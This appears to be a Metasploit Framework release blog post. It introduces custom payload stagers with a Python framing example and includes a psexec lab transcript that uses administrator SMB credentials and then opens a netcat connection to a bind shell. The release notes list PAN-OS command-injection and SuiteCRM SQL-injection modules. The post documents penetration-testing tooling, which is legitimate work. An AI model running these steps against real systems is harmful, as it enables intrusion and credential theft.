Last updated at Tue, 23 Jan 2024 21:56:18 GMT
BYOS: Bring your own stager
We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.
Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the shellcode_file option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.
While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.
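The framing described above (size prepended to the shellcode) is simple enough to show end to end. The block below is an added example, not Metasploit's own handler code: it builds a framed stage the way a custom handler would, and parses one back out of a captured byte stream the way a network sensor or a hand-written handler would, including the two cases a real implementation has to get right: a short read that has not yet delivered the whole stage, and a length field that is not plausible. The page does not say how wide the size field is or its byte order; the 4-byte little-endian header, the MAX_STAGE cap and the sample bytes are all assumptions made for this example.

```python
"""Size-prefixed stage framing for Metasploit-style 'custom' payloads.

Added example, not Metasploit's own code. The page states only that the
shellcode size is prepended to the shellcode; the 4-byte little-endian
length field and the size cap below are assumptions for this example.
"""
from __future__ import annotations

import struct

HEADER = struct.Struct("<I")      # assumed: 4-byte little-endian length prefix
MAX_STAGE = 16 * 1024 * 1024      # assumed sanity cap on a single stage

# Constructed placeholder standing in for a shellcode blob (512 bytes).
CONSTRUCTED_STAGE = bytes(range(256)) * 2


def frame_stage(stage: bytes) -> bytes:
    """Build the on-the-wire message: length prefix followed by the stage."""
    if not stage:
        raise ValueError("empty stage")
    if len(stage) > MAX_STAGE:
        raise ValueError("stage exceeds MAX_STAGE")
    return HEADER.pack(len(stage)) + stage


def parse_stage(buf: bytes) -> tuple[bytes | None, int]:
    """Parse one framed stage from the front of a byte buffer.

    Returns (stage, bytes_consumed). stage is None when the buffer does not
    yet hold a complete message, so the caller should read more and retry.
    Raises ValueError on an implausible length field; that is the check a
    sensor uses to reject a stream that only superficially looks like a stage.
    """
    if len(buf) < HEADER.size:
        return None, 0
    (n,) = HEADER.unpack_from(buf)
    if n == 0 or n > MAX_STAGE:
        raise ValueError(f"implausible stage length {n}")
    end = HEADER.size + n
    if len(buf) < end:
        return None, 0
    return bytes(buf[HEADER.size:end]), end


class StageReader:
    """Accumulate chunks (e.g. successive recv() results) until one stage is complete."""

    def __init__(self) -> None:
        self._buf = bytearray()

    def feed(self, chunk: bytes) -> bytes | None:
        """Append a chunk; return the stage once it is fully received, else None."""
        self._buf += chunk
        stage, used = parse_stage(bytes(self._buf))
        if stage is not None:
            del self._buf[:used]   # keep any bytes that followed the stage
        return stage


def demo_chunked_exchange(chunk_size: int = 100) -> bytes | None:
    """Simulate the handler side: frame a stage, deliver it in chunks, reassemble it."""
    wire = frame_stage(CONSTRUCTED_STAGE)
    reader = StageReader()
    result = None
    for off in range(0, len(wire), chunk_size):
        result = reader.feed(wire[off:off + chunk_size])
    return result


if __name__ == "__main__":
    framed = frame_stage(CONSTRUCTED_STAGE)
    print(f"framed message: {len(framed)} bytes, header {framed[:HEADER.size].hex()}")
    print("reassembled stage matches:", demo_chunked_exchange() == CONSTRUCTED_STAGE)
```

The reassembly loop is the part worth copying: a handler that reads the stage in one recv() and hands whatever arrived to the target will occasionally deliver a truncated blob, and a sensor that trusts the length field without a cap can be made to buffer indefinitely.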
Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.5.132.159 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass v3Mpassword no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser Administrator no The username to authenticate as
Payload options (windows/x64/custom/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.101 yes The listen address (an interface may be specified)
LPORT 4567 yes The listen port
SHELLCODE_FILE x64_shell_bind_4444.bin no Shellcode bin to launch
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.5.135.101:4567
[*] 10.5.132.159:445 - Connecting to the server...
<hacking intensifies>
[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500
[*] 10.5.132.159 - Custom session 1 closed. Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit
Now, we can just open a netcat session to the independent bind shell we started on the target:
[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
IPv4 Address. . . . . . . . . . . : 10.5.132.159
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.5.132.1
Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
Module added to exploit OS Command Injection in PAN-OS
Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits an OS command injection vulnerability, CVE-2020-2038, in PAN-OS. The exploit affects PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS is the operating system behind one of the leading enterprise firewalls, the Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database rates the severity of this vulnerability as high (7.2), since authenticated administrators of the system are able to execute arbitrary commands with root privileges. The root cause is that the management API does not sufficiently filter input to its "op" request. An excellent writeup on exploiting this vulnerability and other similar ones can be found on PT Swarm.
New module content (4)
- SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 - This adds support for EIP-0f5d2d7f, a vulnerability in the uid parameter of the index.php?entryPoint=export page on SuiteCRM 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes of SuiteCRM users, which can then be cracked offline to gain access to SuiteCRM.
- Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 - This adds an exploit module that leverages an OS command injection vulnerability in the PAN-OS management interface, versions 10.0 to 10.0.1, 9.1.0 to 9.1.4, and 9.0.0 to 9.0.10. The vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.
- #16521 from bwatters-r7 - This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.
- #16906 from bcoles - This improves the post/windows/gather/enum_snmp module with shell and PowerShell session support, and fixes issues that low-privileged sessions ran into while reading the registry.
Enhancements and features (5)
- #16911 from bcoles - This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the post/windows/gather/enum_ms_product_keys module.
- #16929 from bcoles - The post/windows/gather/enum_services module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally, documentation has been added on how to use the module.
- #16930 from bcoles - This updates the scripts/resource/dev_checks.rc resource script to fix issues and add additional module checks.
- #16953 from bcoles - The enum_domain script has been updated to support PowerShell and shell sessions, and its documentation and code have been cleaned up.
- #17008 from EmilioPanti - rpc_core.rb has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn't being reported, whilst other statistics like the number of exploit modules, auxiliary modules, and payloads were.
Bugs fixed (5)
- #16928 from bcoles - Multiple bugs have been fixed in the Msf::Post::Windows::Service mixin. Additionally, several methods within this mixin have been adjusted so that the data types they use or return are consistent.
- #16998 from adfoster-r7 - Fixes a crash in modules using the IAX2 client.
- #17013 from zeroSteiner - This PR enhances exploit/multi/http/jenkins_script_console to handle changes to the login process for Jenkins newer than version 2.246.
- #17014 from adfoster-r7 - This fixes the exploit/multi/php/ignition_laravel_debug_rce module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
- #17018 from adfoster-r7 - This fixes the route add command to use a sensible default netmask.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).